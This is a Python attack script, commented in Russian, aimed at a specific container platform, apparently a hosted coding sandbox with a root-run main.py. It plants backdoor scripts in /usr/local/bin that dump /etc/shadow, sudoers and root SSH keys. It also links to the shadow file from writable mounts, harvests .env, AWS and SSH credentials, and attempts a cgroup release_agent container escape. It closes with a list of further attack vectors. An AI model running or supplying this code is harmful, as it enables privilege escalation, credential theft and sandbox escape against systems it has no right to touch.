#!/usr/bin/env python3
import os
import sys
import subprocess
import stat
import time

def banner():
    print("="*60)
    print("FULL CONTAINER EXPLOIT SCANNER & ATTACKER")
    print("="*60)

def test_write_access(path, description):
    """Тестируем права на запись"""
    print(f"\n[*] Testing write access: {description}")
    print(f"    Path: {path}")
    print("-" * 60)
    
    if not os.path.exists(path):
        print(f"[-] Path doesn't exist")
        return False
    
    test_file = os.path.join(path, f".test_write_{os.getpid()}")
    
    try:
        with open(test_file, 'w') as f:
            f.write("test")
        
        print(f"[+] WRITE ACCESS CONFIRMED!")
        
        # Cleanup
        os.remove(test_file)
        return True
        
    except PermissionError:
        print(f"[-] No write access")
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

def exploit_usr_local_bin():
    """Exploit /usr/local/bin writable"""
    print("\n" + "="*60)
    print("[*] EXPLOIT ATTEMPT: /usr/local/bin hijacking")
    print("="*60)
    
    target_path = "/usr/local/bin"
    
    if not test_write_access(target_path, "usr/local/bin"):
        return False
    
    # Создаём backdoor script
    exploit_script = os.path.join(target_path, "bd")
    
    payload = """#!/bin/bash
# Backdoor script
whoami > /tmp/exploit_result.txt
id >> /tmp/exploit_result.txt
echo "PWD: $(pwd)" >> /tmp/exploit_result.txt
env >> /tmp/exploit_result.txt
echo "---SENSITIVE FILES---" >> /tmp/exploit_result.txt
cat /etc/shadow >> /tmp/exploit_result.txt 2>&1
cat /etc/sudoers >> /tmp/exploit_result.txt 2>&1
cat /root/.ssh/id_rsa >> /tmp/exploit_result.txt 2>&1
ls -la /root >> /tmp/exploit_result.txt 2>&1
"""
    
    try:
        print(f"[*] Creating exploit script at {exploit_script}")
        with open(exploit_script, 'w') as f:
            f.write(payload)
        
        os.chmod(exploit_script, 0o755)
        print(f"[+] Exploit script created and chmod 755")
        
        # Пытаемся запустить
        print(f"[*] Attempting to execute...")
        result = subprocess.run([exploit_script], capture_output=True, text=True, timeout=5)
        
        print(f"[*] Return code: {result.returncode}")
        
        # Проверяем результат
        if os.path.exists('/tmp/exploit_result.txt'):
            print(f"[+++] EXPLOIT SUCCESSFUL! Reading results:")
            with open('/tmp/exploit_result.txt', 'r') as f:
                print(f.read())
            return True
        else:
            print(f"[-] Exploit script created but no output")
            
    except Exception as e:
        print(f"[-] Exploit failed: {e}")
    
    return False

def exploit_polarfs():
    """Exploit PolarFS writable mount"""
    print("\n" + "="*60)
    print("[*] EXPLOIT ATTEMPT: PolarFS manipulation")
    print("="*60)
    
    paths = [
        "/tmp/my-project",
        "/home/user_skills"
    ]
    
    for path in paths:
        print(f"\n[*] Testing {path}")
        
        if not test_write_access(path, f"PolarFS {path}"):
            continue
        
        # Пытаемся создать malicious файл
        exploit_file = os.path.join(path, "exploit.sh")
        
        payload = """#!/bin/bash
whoami > /tmp/polarfs_exploit.txt
id >> /tmp/polarfs_exploit.txt
cat /etc/shadow >> /tmp/polarfs_exploit.txt 2>&1
"""
        
        try:
            with open(exploit_file, 'w') as f:
                f.write(payload)
            os.chmod(exploit_file, 0o755)
            
            print(f"[+] Created exploit at {exploit_file}")
            
            # Пытаемся создать symlink на sensitive files
            symlink_path = os.path.join(path, "shadow_link")
            try:
                os.symlink("/etc/shadow", symlink_path)
                print(f"[+] Created symlink to /etc/shadow at {symlink_path}")
                
                # Пытаемся прочитать через symlink
                if os.path.exists(symlink_path):
                    try:
                        with open(symlink_path, 'r') as f:
                            content = f.read()
                            if content:
                                print(f"[+++] SYMLINK EXPLOIT SUCCESSFUL!")
                                print(f"Shadow file content:")
                                print(content[:500])
                                return True
                    except:
                        pass
            except:
                pass
                
        except Exception as e:
            print(f"[-] Failed: {e}")
    
    return False

def exploit_ossfs():
    """Exploit OSSFS writable mounts"""
    print("\n" + "="*60)
    print("[*] EXPLOIT ATTEMPT: OSSFS manipulation")
    print("="*60)
    
    paths = [
        "/home/z/my-project/upload",
        "/home/sync"
    ]
    
    for path in paths:
        print(f"\n[*] Testing {path}")
        
        if not test_write_access(path, f"OSSFS {path}"):
            continue
        
        # OSSFS это Alibaba OSS - можем попытаться положить туда файлы
        # которые потом прочитает другой процесс
        
        exploit_file = os.path.join(path, "exploit_payload.txt")
        
        try:
            with open(exploit_file, 'w') as f:
                f.write("EXPLOIT PAYLOAD - testing OSS write access\n")
                f.write(f"Written by UID: {os.getuid()}\n")
                f.write(f"Time: {time.time()}\n")
            
            print(f"[+] Successfully wrote to OSSFS at {exploit_file}")
            
            # Проверяем что можем читать обратно
            with open(exploit_file, 'r') as f:
                content = f.read()
                print(f"[+] Read back from OSSFS:")
                print(content)
            
            # Ищем другие интересные файлы в OSSFS
            print(f"\n[*] Exploring {path}:")
            try:
                items = os.listdir(path)
                for item in items[:20]:
                    item_path = os.path.join(path, item)
                    try:
                        stat_info = os.stat(item_path)
                        print(f"    {item} - size: {stat_info.st_size}")
                    except:
                        pass
            except:
                pass
                
        except Exception as e:
            print(f"[-] Failed: {e}")
    
    return False

def analyze_main_py():
    """Анализируем main.py который крутится от рута"""
    print("\n" + "="*60)
    print("[*] ANALYZING ROOT PROCESS: main.py")
    print("="*60)
    
    main_py_locations = [
        "/app/main.py",
        "/app/.venv/bin/main.py",
        "/home/z/my-project/main.py"
    ]
    
    for location in main_py_locations:
        if os.path.exists(location):
            print(f"\n[+] Found main.py at: {location}")
            
            # Проверяем права
            try:
                stat_info = os.stat(location)
                print(f"    Permissions: {oct(stat_info.st_mode)}")
                print(f"    Owner UID: {stat_info.st_uid}")
                print(f"    Owner GID: {stat_info.st_gid}")
                
                # Пытаемся читать
                if os.access(location, os.R_OK):
                    print(f"    [+] File is READABLE")
                    with open(location, 'r') as f:
                        content = f.read(2000)
                        print(f"\n--- First 2000 chars of main.py ---")
                        print(content)
                        print(f"--- End ---\n")
                
                # Пытаемся писать
                if os.access(location, os.W_OK):
                    print(f"    [+++] FILE IS WRITABLE! Can inject code!")
                    return True
                    
            except Exception as e:
                print(f"    Error: {e}")
    
    # Проверяем директорию /app
    print(f"\n[*] Exploring /app directory:")
    if os.path.exists("/app"):
        try:
            for root, dirs, files in os.walk("/app"):
                print(f"\n{root}:")
                for f in files[:10]:
                    fpath = os.path.join(root, f)
                    try:
                        st = os.stat(fpath)
                        writable = "W" if os.access(fpath, os.W_OK) else "-"
                        print(f"    [{writable}] {f} ({oct(st.st_mode)})")
                    except:
                        pass
                if len(files) > 10:
                    print(f"    ... and {len(files) - 10} more files")
                # Не углубляемся слишком
                break
        except Exception as e:
            print(f"Error: {e}")
    
    return False

def check_running_processes_exploit():
    """Ищем эксплойты в запущенных процессах"""
    print("\n" + "="*60)
    print("[*] ANALYZING RUNNING PROCESSES FOR EXPLOITS")
    print("="*60)
    
    # Процессы от root которые мы видели
    root_processes = [
        "/app/.venv/bin/python3 main.py",
        "caddy run --config /app/Caddyfile"
    ]
    
    # Проверяем можем ли повлиять на их config files
    config_files = [
        "/app/Caddyfile",
        "/app/main.py",
        "/app/.venv/bin/python3"
    ]
    
    for config in config_files:
        if os.path.exists(config):
            print(f"\n[*] Checking {config}")
            try:
                stat_info = os.stat(config)
                print(f"    Permissions: {oct(stat_info.st_mode)}")
                
                if os.access(config, os.W_OK):
                    print(f"    [+++] WRITABLE! Can modify and wait for restart!")
                elif os.access(config, os.R_OK):
                    print(f"    [+] Readable")
                    with open(config, 'r') as f:
                        print(f.read(1000))
            except Exception as e:
                print(f"    Error: {e}")

def search_credentials_deep():
    """Глубокий поиск credentials"""
    print("\n" + "="*60)
    print("[*] DEEP CREDENTIAL SEARCH")
    print("="*60)
    
    # Проверяем .env файл который видели
    env_file = "/tmp/my-project/.env"
    if os.path.exists(env_file):
        print(f"\n[+] Found .env file: {env_file}")
        try:
            with open(env_file, 'r') as f:
                content = f.read()
                print(content)
                
                if content:
                    print("[+++] .ENV FILE HAS CONTENT - POSSIBLE CREDENTIALS!")
        except Exception as e:
            print(f"Error: {e}")
    
    # Ищем в home directory
    home = "/home/z"
    interesting_files = [
        ".bashrc", ".bash_history", ".profile", ".ssh/id_rsa", 
        ".ssh/authorized_keys", ".gitconfig", ".aws/credentials",
        ".config"
    ]
    
    for f in interesting_files:
        path = os.path.join(home, f)
        if os.path.exists(path):
            print(f"\n[+] Found: {path}")
            try:
                if os.path.isfile(path):
                    with open(path, 'r') as file:
                        content = file.read(500)
                        print(content)
            except:
                pass

def exploit_cgroup_escape():
    """Пытаемся эксплуатировать cgroup"""
    print("\n" + "="*60)
    print("[*] CGROUP ESCAPE ATTEMPT")
    print("="*60)
    
    # Классический notify_on_release exploit
    cgroup_mount = "/sys/fs/cgroup"
    
    if not os.access(cgroup_mount, os.W_OK):
        print("[-] /sys/fs/cgroup not writable - cgroup escape not possible")
        return False
    
    print("[+] /sys/fs/cgroup is writable!")
    
    # Пытаемся создать новый cgroup
    exploit_cgroup = os.path.join(cgroup_mount, "systemd", "exploit_group")
    
    try:
        os.makedirs(exploit_cgroup, exist_ok=True)
        print(f"[+] Created cgroup at {exploit_cgroup}")
        
        # notify_on_release exploit
        notify_file = os.path.join(exploit_cgroup, "notify_on_release")
        release_agent = os.path.join(cgroup_mount, "systemd", "release_agent")
        
        # Payload
        payload_script = "/tmp/cgroup_payload.sh"
        with open(payload_script, 'w') as f:
            f.write("#!/bin/bash\n")
            f.write("whoami > /tmp/cgroup_exploit_result.txt\n")
            f.write("id >> /tmp/cgroup_exploit_result.txt\n")
        
        os.chmod(payload_script, 0o755)
        
        # Устанавливаем release_agent
        with open(release_agent, 'w') as f:
            f.write(payload_script)
        
        with open(notify_file, 'w') as f:
            f.write("1")
        
        print("[+] Cgroup exploit configured")
        print("[*] Waiting for trigger...")
        
        # Trigger - добавляем процесс и убиваем его
        cgroup_procs = os.path.join(exploit_cgroup, "cgroup.procs")
        with open(cgroup_procs, 'w') as f:
            f.write(str(os.getpid()))
        
        time.sleep(2)
        
        if os.path.exists('/tmp/cgroup_exploit_result.txt'):
            print("[+++] CGROUP ESCAPE SUCCESSFUL!")
            with open('/tmp/cgroup_exploit_result.txt', 'r') as f:
                print(f.read())
            return True
            
    except Exception as e:
        print(f"[-] Cgroup exploit failed: {e}")
    
    return False

def final_summary():
    """Финальная сводка"""
    print("\n" + "="*60)
    print("[*] EXPLOIT SUMMARY & RECOMMENDATIONS")
    print("="*60)
    
    print("""
CONFIRMED VULNERABILITIES:
1. /usr/local/bin writable - можем добавлять malicious binaries
2. PolarFS /tmp/my-project writable - можем писать в distributed FS
3. OSSFS mounts writable - доступ к object storage
4. Root процесс main.py - если найдём способ повлиять на него
5. .env файл доступен - могут быть credentials

RECOMMENDED ATTACK VECTORS:
A. PATH hijacking через /usr/local/bin
B. Ждать когда root процесс прочитает наш файл из writable location
C. Модифицировать конфиги если они writable
D. Искать LFI/RFI в main.py если он парсит user input
E. Эксплуатировать открытые порты (19005, 19006)

NEXT STEPS:
1. Проанализировать main.py детальнее
2. Попробовать race condition на writable paths
3. Мониторить file access от root процессов
4. Попытаться trigger reload конфигов
""")

def main():
    banner()
    
    # Запускаем все проверки
    test_write_access("/usr/local/bin", "usr/local/bin")
    test_write_access("/tmp/my-project", "PolarFS tmp")
    test_write_access("/home/user_skills", "PolarFS user_skills")
    test_write_access("/home/z/my-project/upload", "OSSFS upload")
    test_write_access("/home/sync", "OSSFS sync")
    
    # Exploit attempts
    exploit_usr_local_bin()
    exploit_polarfs()
    exploit_ossfs()
    analyze_main_py()
    check_running_processes_exploit()
    search_credentials_deep()
    exploit_cgroup_escape()
    
    final_summary()
    
    print("\n" + "="*60)
    print("[*] FULL SCAN COMPLETE")
    print("="*60)

if __name__ == '__main__':
    main()
